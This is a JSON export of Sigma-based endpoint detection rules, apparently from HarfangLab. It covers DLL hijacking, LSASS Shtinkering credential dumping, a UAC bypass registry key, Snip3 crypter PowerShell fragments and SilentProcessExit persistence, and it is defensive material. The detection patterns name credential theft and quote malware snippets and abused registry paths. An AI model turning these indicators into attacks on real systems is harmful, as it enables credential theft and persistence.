"rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591331Z", "creation_date": "2026-03-23T11:45:34.591334Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591341Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_eduprintprov.yml", "content": "title: DLL Hijacking via eduprintprov.exe\nid: 13135882-44de-4952-9602-946619060e2e\ndescription: |\n Detects potential Windows DLL Hijacking via eduprintprov.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eduprintprov.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\policymanager.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "13135882-44de-4952-9602-946619060e2e", "rule_name": "DLL Hijacking via eduprintprov.exe", "rule_description": "Detects potential Windows DLL Hijacking via eduprintprov.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1326ca37-dc76-44d4-8db5-d101df291be4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.089206Z", "creation_date": "2026-03-23T11:45:34.089208Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.089212Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_mcbuilder.yml", "content": "title: DLL Hijacking via mcbuilder.exe\nid: 1326ca37-dc76-44d4-8db5-d101df291be4\ndescription: |\n Detects potential Windows DLL Hijacking via mcbuilder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcbuilder.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcp47mrm.dll'\n - '\\mrmcoreR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1326ca37-dc76-44d4-8db5-d101df291be4", "rule_name": "DLL Hijacking via mcbuilder.exe", "rule_description": "Detects potential Windows DLL Hijacking via mcbuilder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "13384352-88eb-420b-a83a-24445d5a52c4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095469Z", "creation_date": "2026-03-23T11:45:34.095471Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095475Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://attack.mitre.org/techniques/T1003/001/" ], "name": "t1003_001_lsass_shtinkering.yml", "content": "title: Possible LSASS Shtinkering Detected\nid: 13384352-88eb-420b-a83a-24445d5a52c4\ndescription: |\n Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\nreferences:\n - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/04/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n SourceImage: '*\\WerFault.exe'\n ProcessCommandLine|contains: ' -u -p * -ip * -s *'\n\n exclusion_werfault:\n SourceImage: '*\\WerFault.exe'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: '?:\\Windows\\System32\\lsass.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "13384352-88eb-420b-a83a-24445d5a52c4", "rule_name": "Possible LSASS Shtinkering Detected", "rule_description": "Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\n", "rule_creation_date": "2023-04-03", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001", "attack.t1078" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "13754f19-10c9-40db-935a-4043b68e2ffd", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092489Z", "creation_date": "2026-03-23T11:45:34.092492Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.092496Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/hfiref0x/UACME", "https://twitter.com/hfiref0x/status/928869933035020288" ], "name": "t1548_002_prepare_uac_bypass_icolordataproxy.yml", "content": "title: IColorDataProxy COM UAC Bypass Prepared\nid: 13754f19-10c9-40db-935a-4043b68e2ffd\ndescription: |\n Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://twitter.com/hfiref0x/status/928869933035020288\ndate: 2020/10/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\\DisplayCalibrator'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_legitimate:\n # Legitime value set by Windows\n Details: '%SystemRoot%\\System32\\DCCW.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "13754f19-10c9-40db-935a-4043b68e2ffd", "rule_name": "IColorDataProxy COM UAC Bypass Prepared", "rule_description": "Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n", "rule_creation_date": "2020-10-14", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1112", "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.607132Z", "creation_date": "2026-03-23T11:45:34.607135Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.607142Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", "https://attack.mitre.org/software/S1086/", "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1059_001_snip3_crypter_detected.yml", "content": "title: Snip3 Crypter Detected\nid: 13b86531-8b7b-4ef9-bb5a-3d56f788744b\ndescription: |\n Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\n Snip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time\n - https://attack.mitre.org/software/S1086/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.execution\n - attack.t1059.001\n - attack.t1059.005\n - attack.command_and_control\n - attack.t1104\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Snip3\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Obfuscation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains|all:\n - 'Add-Type -AssemblyName Microsoft.VisualBasic'\n - '[System.Text.Encoding]::Default.GetString(@('\n - '[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath('\n - ' = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,\"|\")[0]'\n - ' [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))'\n - ' Start-Sleep -Milliseconds '\n\n selection_2:\n PowershellCommand|contains|all:\n - 'function DropToStartup() {'\n - '[System.Text.Encoding]::Default.GetString(@('\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b", "rule_name": "Snip3 Crypter Detected", "rule_description": "Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\nSnip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n", "rule_creation_date": "2024-11-12", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.execution", "attack.persistence" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1059.005", "attack.t1104", "attack.t1547.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "14032905-0b18-4b4a-851c-3fafff461ba1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.076139Z", "creation_date": "2026-03-23T11:45:34.076141Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.076146Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit", "https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/", "https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html", "https://attack.mitre.org/techniques/T1546/012/" ], "name": "t1546_012_persistence_using_silent_process_exit.yml", "content": "title: Possible SilentProcessExit Registry Persistence Added\nid: 14032905-0b18-4b4a-851c-3fafff461ba1\ndescription: |\n Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\n Silent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\n Attackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\n It is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit\n - https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/\n - https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2022/09/19\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_silence_process_exit:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode'\n\n selection_image_options:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag'\n Details: 'DWORD (0x000002??)'\n\n exclusion_empty:\n Details: '(Empty)'\n\n exclusion_msiexec:\n ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\streem.exe\\GlobalFlag'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\BoxUI.exe\\GlobalFlag'\n\n exclusion_captureone:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CaptureOne.Win.*.tmp'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\captureone.exe\\ReportingMode'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\captureone.exe\\GlobalFlag'\n\n exclusion_ManagerAdmin:\n ProcessImage: '?:\\Program Files\\Dassault Systemes\\\\*\\win_b??\\code\\bin\\DSYSysIRManagerAdmin.exe'\n ProcessSigned: 'true'\n ProcessInternalName: 'DSYSysIRManagerAdmin.exe'\n ProcessSignature|contains: 'DASSAULT'\n\n exclusion_adobe:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Illustrator.exe\\GlobalFlag'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Adobe Inc.'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "14032905-0b18-4b4a-851c-3fafff461ba1", "rule_name": "Possible SilentProcessExit Registry Persistence Added", "rule_description": "Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\nSilent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\nAttackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\nIt is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\n", "rule_creation_date": "2022-09-19", "rule_modified_date": "2025-03-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1546.012" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "14b8dddd-67f2-4c76-b54c-d77daec6b252", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627205Z", "creation_date": "2026-03-23T11:45:34.627208Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627212Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1564/", "https://attack.mitre.org/techniques/T1036/" ], "name": "t1564_suspicious_recycle_bin.yml", "content": "title: Suspicious Process Executed from Recycle Bin Folder\nid: 14b8dddd-67f2-4c76-b54c-d77daec6b252\ndescription: |\n Detects a suspicious execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2025/01/28\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\n filter_deleted_file:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "14b8dddd-67f2-4c76-b54c-d77daec6b252", "rule_name": "Suspicious Process Executed from Recycle Bin Folder", "rule_description": "Detects a suspicious execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n", "rule_creation_date": "2025-01-28", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036", "attack.t1564" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "14c2f793-59ba-4331-86c7-8146946b4943", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591425Z", "creation_date": "2026-03-23T11:45:34.591429Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591437Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_msra.yml", "content": "title: DLL Hijacking via msra.exe\nid: 14c2f793-59ba-4331-86c7-8146946b4943\ndescription: |\n Detects potential Windows DLL Hijacking via msra.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 